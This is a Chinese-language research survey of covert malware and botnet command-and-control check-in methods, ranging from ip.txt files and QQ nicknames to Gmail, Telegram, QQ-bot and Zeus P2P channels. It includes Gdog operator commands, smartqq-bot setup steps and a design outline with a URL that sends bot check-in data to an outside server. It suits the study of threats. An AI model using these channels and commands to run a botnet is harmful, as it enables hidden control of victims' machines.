惡意軟件/BOT/C2隱蔽上線方式研究

catalogue

1. 傳統木馬上線方式
2. 新型木馬上線方式
3. QQ昵稱上線
4. QQ空間資料上線
5. 第三方域名上線
6. UDP/TCP二階段混合上線
7. Gmail CNC
8. NetBot兩次TCP握手驗證上線
9. IRC Bot
10. WEBSHELL Bot
11. twittor Bot
12. Blaze Telegram Backdoor Toolkit (bt2)
13. 微信服務號Bot
14. smartqq-bot  
15. P2P Bot 

 

1. 傳統木馬上線方式

0x1: 正向主動連接

最早的遠控木馬都是"主動連接"，即肉雞客戶端主動監聽一個端口(提前配置好)，等待主控端來連接，但是后來因為互聯網的進一步發展，公網控制內網就出現了一定的問題，所以這種方法逐步不再使用

0x2: 反向(被動上線)

這是當前比較主流的C2 Bot上線方法，"被動連接"型的木馬和"主動連接"的形式剛好相反，是木馬即被控端主動來連接主控端。主控端開啟一個端口，被控端去連接你配置好的IP地址(常常是硬編碼在Binary內部)
有兩種比較流行的被動上線方式

1. FTP/HTTP上線方式: 馬的上線地址對應一個ftp文件下載鏈接
2. DNS域名解析: 馬的上線地址對應一個DNS域名
//核心都是一種代理思想，將實際的、動態變化的上線IP/PORT通過一層動態解析機制隱藏起來

1. FTP Server保存文件(ip.txt)上線

在FTP服務器上寫入一個ip.txt，內容就是你的主控端監聽的IP地址和端口。當你的IP地址改變之后，你只需要再次更新這個ip.txt的內容即可。在配置木馬的時候，只需要按照FTP上線方式的格式配置上線地址

2. HTTP Server保存文件(ip.txt)上線

和FTP Server方式原理是類似的，只是使用的網絡協議不一樣

http://www.tekla.pw/ip.txt

3. 域名解析上線

C2馬通過靜態編譯將DNS解析庫鏈接進Binary中，在回連上線前動態獲取DNS IP地址，DNS作為一種互聯網基礎設施，可以保持穩定上線，靈活修改的特點 

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

2. 新型木馬上線方式

躲避網絡監控設備的檢測的思路其實很容易理解

1. 使用基礎服務、公共服務常用協議，例如HTTP協議通信
2. 2級、多級代理方式，將點對點通信方式解耦
3. 反沙箱、反監控檢測技術

接下來逐個分析

 

3. QQ昵稱上線

這是一種公共信道的隱藏方式

http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=869655938

大灰狼/獵狐遠控就采用了這種上線方式(DNS/IP/QQ昵稱混合)

通過API獲取指定QQ號的昵稱數據后，進行簡單的算法解密、Base64解密，得到IP:Port信息，隨后的流程和C/S架構的Bot類似

portraitCallBack({"202109629":["http://qlogo2.store.qq.com/qzone/202109629/202109629/100",0,-1,0,0,0,"npmwkqr",0]})

Relevant Link:

http://drops.wooyun.org/papers/14412 

 

4. QQ空間資料上線

和QQ昵稱的上線方式一樣，都是將加密后的上線信息寫在一個可公共HTTP/API/JSON訪問的地方，常常是社交媒體(提高隱蔽性)，對於馬來說需要增加一個網絡IO獲取過程和解密過程，其他過程和傳統的木馬上線方式一樣

Relevant Link:

http://blogs.360.cn/360safe/2014/08/29/cnc_trojan_and_fake_proto/

 

5. 第三方域名上線

這種木馬使用的第三方域名實際上是利用第三方網站能夠寫入並及時修改自己的通信數據。木馬編寫者往往會尋找知名的網站，至少不會出現宕機的情況，以保持肉雞的持久性控制。這樣的網站很多，比如說博客類網站等等。可以提前發表一篇博文，並在博文里插入控制命令，之后特制的木馬，就會去獲取控制命令，同時木馬也可以模擬編輯博文，寫入執行結果的數據
這種方式的缺點是無法進行大批量的數據傳輸，像文件傳輸這樣的功能雖然也可以實現，但是"用戶體驗"很差，所以這種上線方式的木馬，大多被用來當作一個隱蔽的后門木馬，只需要有一個文件下載和CMD Shell的功能

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

6. UDP/TCP二階段混合上線

這類似於anti-Sandbox的對抗思路，木馬利用了malware network sandbox常常處於隔離的斷網環境的條件，進行sandbox探測，如果檢測到處於sandbox環境則隱藏真實C&C Login行為，從而躲避網絡抓包的檢測

Relevant Link:

http://www.freebuf.com/articles/system/74679.html

 

7. Gmail CNC

Gdog是一款基於Python，以Gmail作為命令和控制服務器的Winddows后門工具，具有隱蔽性的優勢

0x1: 特點

1. 通信數據加密（AES）+SHA256哈希
2. 使用系統信息生成唯一的id(SHA256哈希)
3. Job IDs是隨機的SHA256哈希
4. 獲取系統信息
5. 獲取地理信息(城市，國家，經度，緯度 等等)
6. 獲取運行的進程、服務、用戶、設備(硬件)
7. 獲取客戶端列表
8. 執行系統命令
9. 從客戶端下載文件
10. 上傳文件至客戶端
11. 執行shellcode
12. 截屏
13. 鎖定客戶端屏幕
14. 鍵盤記錄
15. 關閉或重啟遠程計算機
16. 注銷當前用戶
17. 從WEB下載文件
18. 訪問網站
19. 給用戶彈消息框

0x2: 設置

1. 一個Gmail賬戶 
2. 在賬戶的安全設置中打開"Allow less secure apps"
3. 在賬戶設置中啟動IMAP

0x3: Bot Client

和大多數Bot Client一樣，Client主要由以下幾個大塊組成

1. 收集當前主機信息，加密(可選)，發送給C2C端(通過gmail郵件實現代理效果)
2. c2c消息解析模塊
3. 執行具體功能的函數模塊(keylogger、screenshot、cmd..)

1. 上線

client將信息以加密方式發送到指定gmail帳號中，郵件標題即為client id號

2. 執行指令

Bot Client定時地從gmail郵箱中獲取最新的"指令郵件"，執行后，將執行結果發送回gmail郵箱，可以看出，Bot Client是一個典型的解耦架構

{'res': ['0;System Idle Process', '4;System', '320;smss.exe', '444;csrss.exe', '548;wininit.exe', '620;services.exe', '628;lsass.exe', '724;svchost.exe', '788;svchost.exe', '300;svchost.exe', '304;svchost.exe', '8;svchost.exe', '1060;svchost.exe', '1068;svchost.exe', '1092;svchost.exe', '1200;WUDFHost.exe', '1296;igfxCUIService.exe', '1324;svchost.exe', '1428;ibmpmsvc.exe', '1528;QQPCRTP.exe', '1732;WUDFHost.exe', '1864;WUDFHost.exe', '1852;vpnagent.exe', '2172;spoolsv.exe', '2496;svchost.exe', '2520;mDNSResponder.exe', '2528;AppleMobileDeviceService.exe', '2564;ibtsiva.exe', '2672;pcas.exe', '2708;QQProtect.exe', '2724;secbizsrv.exe', '2732;TenpayServer.exe', '2888;SynTPEnhService.exe', '2904;svchost.exe', '2988;svchost.exe', '2996;TBSecSvc.exe', '3008;TsService.exe', '3016;valWBFPolicyService.exe', '3052;vmware-authd.exe', '3060;valWbioSyncSvc.exe', '1588;vmware-usbarbitrator64.exe', '1584;vmnetdhcp.exe', '2464;vmnat.exe', '3144;wwbizsrv.exe', '3356;dasHost.exe', '3464;WmiPrvSE.exe', '3736;vmware-hostd.exe', '5664;PresentationFontCache.exe', '6492;GoogleUpdate.exe', '16084;QQMusicService.exe', '8280;OfficeClickToRun.exe', '6732;SearchIndexer.exe', '5956;dllhost.exe', '13108;csrss.exe', '16968;winlogon.exe', '12128;dwm.exe', '18876;SynTPEnh.exe', '8052;SensorDBSynch.exe', '5288;sihost.exe', '8336;conhost.exe', '7200;taskhostw.exe', '11464;igfxEM.exe', '16660;SynTPHelper.exe', '11348;explorer.exe', '19204;aliwssv.exe', '5928;conhost.exe', '10036;RemindersServer.exe', '8200;SynTPLpr.exe', '12400;SynLenovoHelper.exe', '16916;ShellExperienceHost.exe', '2664;TSVNCache.exe', '16288;RuntimeBroker.exe', '10412;SearchUI.exe', '720;SettingSyncHost.exe', '11592;QQPCTray.exe', '18176;QQPCNetFlow.exe', '12444;QQPCRealTimeSpeedup.exe', '13812;AliLangAgent.exe', '17896;AliLangClient.exe', '19792;yunpan.exe', '16812;FileEncryptionSvr.exe', '9316;alineiwai.exe', '19816;vmware-tray.exe', '18336;svchost.exe', '13660;RAVCpl64.exe', '18096;RAVBg64.exe', '10572;TXPlatform.exe', '12936;DingTalk.exe', '1516;DingTalk.exe', '15956;DingTalk.exe', '12768;DingTalk.exe', '15508;AliIM.exe', '16100;AliApp.exe', '11996;TaobaoProtect.exe', '7284;QQBrowser.exe', '9896;firefox.exe', '6368;QQBrowser.exe', '13520;qqbrowser.exe', '11364;chrome.exe', '17372;chrome.exe', '5124;360se.exe', '5924;chrome.exe', '9664;pycharm.exe', '17432;qqbrowser.exe', '15416;ONENOTE.EXE', '19840;360se.exe', '13364;chrome.exe', '17064;sublime_text.exe', '11028;360se.exe', '13040;qqbrowser.exe', '12556;qqbrowser.exe', '19872;qqbrowser.exe', '15204;360se.exe', '11992;cmd.exe', '16600;cmd.exe', '9052;conhost.exe', '13096;conhost.exe', '15580;360se.exe', '19172;QMChExt.exe', '12876;QMChExt.exe', '16536;qqbrowser.exe', '15424;qqbrowser.exe', '16024;ONENOTEM.EXE', '6152;fsnotifier.exe', '13480;conhost.exe', '10452;SkypeHost.exe', '13048;QQDownload.exe', '1276;editplus.exe', '6440;SystemSettingsBroker.exe', '17368;NetworkUXBroker.exe', '16404;fontdrvhost.exe', '18968;AliIM.exe', '13704;AliApp.exe', '5624;360se.exe', '15552;Xshell.exe', '7336;XshellCore.exe', '12700;filezilla.exe', '16980;chrome.exe', '896;QQMusic.exe', '20040;QQMusicExternal.exe', '20356;QQMusicExternal.exe', '19228;QQMusicIE.exe', '32;QQMusicExternal.exe', '13904;audiodg.exe', '17796;FMAPP.exe', '8104;chrome.exe', '16344;wampmanager.exe', '5512;httpd.exe', '6392;mysqld.exe', '9096;httpd.exe', '10592;ApplicationFrameHost.exe', '10556;Calculator.exe', '1056;Microsoft.Photos.exe', '17112;chrome.exe', '5044;chrome.exe', '19028;chrome.exe', '3264;SystemSettings.exe', '6984;chrome.exe', '10344;chrome.exe', '6912;360se.exe', '12344;360se.exe', '19640;QQ.exe', '1156;QQExternal.exe', '18984;qqbrowser.exe', '2596;cmd.exe', '7328;conhost.exe', '16524;360se.exe', '5888;360se.exe', '4188;360se.exe', '2748;SearchProtocolHost.exe', '10756;WmiPrvSE.exe', '18776;SearchFilterHost.exe', '9596;python.exe', '7912;conhost.exe'], 'cmd': 'tasks'}

0x4: Bot CNC

1. 查看當前在線Client

CNC和Bot Client實現了完全的解耦，CNC通過查收gmail郵件的方式查看當前在線主機

python gdog.py -info -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

2. 向Bot Client發送指令並取回執行結果

python gdog.py -cmd "net user" -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

Bot Client執行的結果依然通過郵件發送回來了，所以CNC需要主動去"嘗試獲取"執行結果

python gdog.py -jobid 2b680930e5bd74ef9e5dca9ee8ff3fe2d20f57cfce693da341d9c10aae52065d -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

類似的還有gcat

Relevant Link:

http://www.freebuf.com/sectool/105144.html
https://github.com/byt3bl33d3r/gca

 

8. NetBot兩次TCP握手驗證上線

1. Bot Client -> CNC: 00000011f4000000354c6d80b0ff7600
/*
1. anti-sandbox: 保證在C2C存活的前提下才發送真正的上線請求包
2. anti-scanner: 對於一般的單次交互scanner來說，這種設計的C2C會更加隱蔽一些
*/
2. CNC -> Bot Client: TCP ACK
3. Bot Client -> CNC: b4b2b1b8b2b6b2b8adb1b5b3b9c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b5b1b48d84c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c29769709a92a29392b3c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1acb4b4b9b68d8a7cc2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1b9b4b0b1b8bab0b1b1b4b0b1b3b5c2b4b2b1b8b2b5b3b2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c262c2c2c2
4. 上線成功
5. CNC -> Bot Client(定時發送心跳包): 03000000000000000000000000000000

 

9. IRC Bot

利用IRC中繼組網方式管理CNC和Bot Client的通信，在實際的案例中，有遇到過

1. PHP IRC Bot
2. Perl IRC Bot

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5215766.html
http://www.cnblogs.com/LittleHann/p/5394926.html

 

10. WEBSHELL Bot

WEBSHELL Bot本質上不是新技術，它和gmail bot/irc bot的邏輯架構是一樣的，都是由Client發起異步輪詢指令，並將執行結果回傳，等待CNC異步取回的模式

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5507555.html

 

11. twittor Bot

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Relevant Link:

https://github.com/PaulSec/twittor

 

12. Blaze Telegram Backdoor Toolkit (bt2)

0x1: 簡介

1. Telegram

1. 跨平台的實時通訊應用
2. 支持Android、iPhone/iPad、WP、Web、PC/Mac/Linux
3. 通信加密: Telegram Encryption
4. 支持發送所有文件類型
5. 開放api，可定制開發客戶端

2. Bots: Tegegram內置的第三方應用，通信方式為HTTPS，功能(類似於聊天機器人)

1. Get customized notifications and news
2. Integrate with other services
3. Create custom tools
4. Build single- and multiplayer games
5. Build social services
6. Do virtually anything else

Relevant Link:

http://drops.wooyun.org/tips/16142 
https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/
https://github.com/nickoala/telepot
https://github.com/blazeinfosec/bt2

 

13. 微信服務號Bot

和Gmail Bot不同的是，微信公眾號/Tegegram Bot可以實現簡單的"聊天機器人"功能，相當於省去了輪詢從獲取Gmail郵件的步驟，減少了心跳/消息回傳的編碼開銷，相當於一個簡單的圖靈機

0x1: 申請個人微信服務號

微信對申請人有一定的准入門檻，需要經過一個申請流程才能拿到服務號

Relevant Link:

https://www.zhihu.com/question/20492916
http://kf.qq.com/faq/120322fu63YV130422AJbaI3.html

 

14. smartqq-bot 

0x1: 安裝啟動

apt-get install npm 
apt-get install node 
npm install -g smartqq-bot
nodejs /usr/local/lib/node_modules/smartqq-bot/main.js
http://114.55.36.222:3100/ 
使用手機QQ掃描登錄后

0x2: 訪問API接口

http://114.55.36.222:3200/send?type=[group|buddy|discuss]&to=[qqnumber/nick/gname]&msg=[msg]
http://114.55.36.222:3200/send?type=group&to=198167523&msg="test for bot"
http://114.55.36.222:3200/send?type=buddy&to=753125749&msg=hello

0x3: CNC QQ

用於部署CNC的QQ就是我們基於smart qq通過掃碼登錄的qq，實現基於QQ的CNC可以采取以下思路

1. Bot Client啟動后，和普通的malware一樣，進行持久化保護(注冊服務、內存注入、注冊表啟動項等)，收集本機信息，例如windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
2. Bot Client通過Smart QQ API，將上線信息發送給Proxy QQ
http://114.55.36.222:3200/send?type=group&to=媽媽說名字長會有人粉&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1

3. Proxy QQ(Nodejs Server)要完成兩件事
    1) 將消息轉發到QQ Group CNC上，甚至可以通過啟動另一個Smart QQ來操作QQ Group CNC
    2) 記錄Bot Client的上線信息(操作系統、帶寬、內存、CPU核數等)

4. 根據自定義協議，接收來自QQ Group CNC的"cmd指令"，例如list，將接收到的指令保存在內存隊列中，等待Bot Client來獲取
5. Bot Client會定時從Proxy QQ獲取最新的"cmd指令"，本地執行后，將執行結果同樣通過Smart QQ API傳回給Proxy QQ，Proxy QQ可以記錄到后端DB，以及轉發到QQ Group CNC中
6. 以上便完成了一個完成的Bot Client和CNC的指令交互過程

Relevant Link: 

https://www.npmjs.com/package/smartqq-bot
https://github.com/ScienJus/qqbot
http://www.scienjus.com/webqq-analysis-1/
https://github.com/xqin/SmartQQ-for-Raspberry-Pi/blob/master/WebQQ.py
https://github.com/ScienJus/smartqq

 

15. P2P Bot

a modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient. (Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.)
傳統C/S集中式CNC Bot的缺點在於中心化，即如果處於網絡拓朴中心的CNC失效了，則不管肉雞Bot是否存活，BOT操縱者已經沒有機會"指示"剩余依舊存活的肉雞重新指向另一個CNC，因為和他們唯一通信的舊CNC已經失效了
而P2P網絡能解決這一問題，Bot不再直接和中心CNC進行TCP通信，而是使用peer-2-peer協議和所有其他肉雞進行通信，並且新的肉雞很容易借助p2p協議"入網"，Bot之間共享一份動態的ip list文件(在p2p基礎上再加一層代理的思想)，這樣，當一個C2服務器失效后，操縱者可以很容易的入網，然后重新"傳播"一份新的上線ip list，讓剩余的存活肉雞重新上線，p2p解決了在C2 CNC失效后，如何通知BOT肉雞的難題
To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server. Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime.

0x1: 運行方式

1. When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data.
2. To initiate a communication the bot sends out a “portknocking” data packet that contains a  header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine. 
3. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines.
4. More UDP packets may follow the portknocking, exchanging different data 

When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive both a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server.

0x2: 完全P2P化

With the latest update, it seems that the C&C server has disappeared entirely for this functionality. Where they were previously sending and receiving control messages to and from the C&C, these control messages are now handled by the P2P network.
This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots—every compromised computer is capable of providing data to the other bots.
While these changes make the botnet more resistant to takedown, and equally more difficult to track the attackers behind it, it also provides another major benefit to the attackers.
通過使用P2P進行網絡架構改造，僵屍網絡完全脫離了CNC節點的失效風險

0x3: More UDP, less TCP

Another noticeable update is that communication has shifted more and more to UDP. As we have previously discussed, the bots would contact each other by using a sort of homemade UDP handshake. If successful, this would cause the bots to exchange TCP data, such as configuration files, list of other peers, etc. However, TCP communications are easy to track and dump, and the bot does not perform any authentication on the packets exchanged, so anyone can impersonate a bot and successfully communicate with other bots, downloading stuff like configuration data.
In this new strain, the data exchange is also now happening in UDP. Given the stateless nature of this protocol, it is more difficult to capture and extract data from bot communications.

Relevant Link:

http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye

 

Copyright (c) 2016 LittleHann All rights reserved